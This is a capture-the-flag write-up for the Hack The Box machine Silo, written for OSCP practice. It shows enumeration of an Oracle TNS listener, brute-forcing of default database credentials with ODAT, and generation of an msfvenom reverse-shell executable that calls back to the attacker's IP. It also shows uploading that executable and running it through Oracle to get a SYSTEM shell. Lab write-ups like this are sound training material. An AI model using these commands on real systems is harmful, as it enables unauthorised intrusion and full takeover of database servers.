Hack The Box — Silo — without Metasploit (TJNull’s list for OSCP)
This is my 29th write-up for Silo, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -Pn -oA nmap/initial silo.htb
So, we have an HTTP server running and Orcale TNS listener on ports 1521 and 4196.
Let’s jump to the HTTP server and see what we have there.
Default page for Microsoft IIS. Let’s try directory busting and see if we get anything.
gobuster dir -u http://silo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x asp,,db,jsp,html,log,txt -t 200 -k --no-error
But it does not reveal anything.
Let’s try enumerating the Oracle TNS listener. We will be using odat (Oracle Database Attacking Tool) for that.
First, let’s enumerate the valid SIDs.
odat sidguesser -s silo.htb -p 1521
XE seems to be a valid SID for the server.
There’s a default users list in Metasploit, let’s locate it and copy it.
locate oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .
The username and passwords in this list are separated by a space instead of a forward slash (/). We’ll have to change it to forward slash so that the ODAT tool is able to parse the file. This can be done in vi using the following command.
:%s/ /\//g
So, that the file looks something like this:
Now let’s use this to brute force the credentials.
odat passwordguesser -s silo.htb -p 1521 -d XE --accounts-file /root/TJNull/Windows/Silo/oracle_default_userpass.txt
(You may have to give full path of the oracle_default_userpass.txt file)
And we got the credentials scott/tiger
Initial Foothold
ODAT has a utlfile module that allows you to upload, download or delete a file. Since, we are trying to get code execution on the box, let’s upload a malicious executable that sends a reverse shell back to our attack machine.
For that, first we need to generate a shell for windows.
msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=4242 -f exe > shell.exe
Now, let’s upload the file using the utlfile module.
odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe shell.exe
We get a privilege error. Just add sysdba flag in the command.
odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe /root/TJNull/Windows/Silo/shell.exe --sysdba
Let’s start a listener and execute it using externaltable.
odat externaltable -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba
And we got a system shell! No Privilege Escalation needed.
:)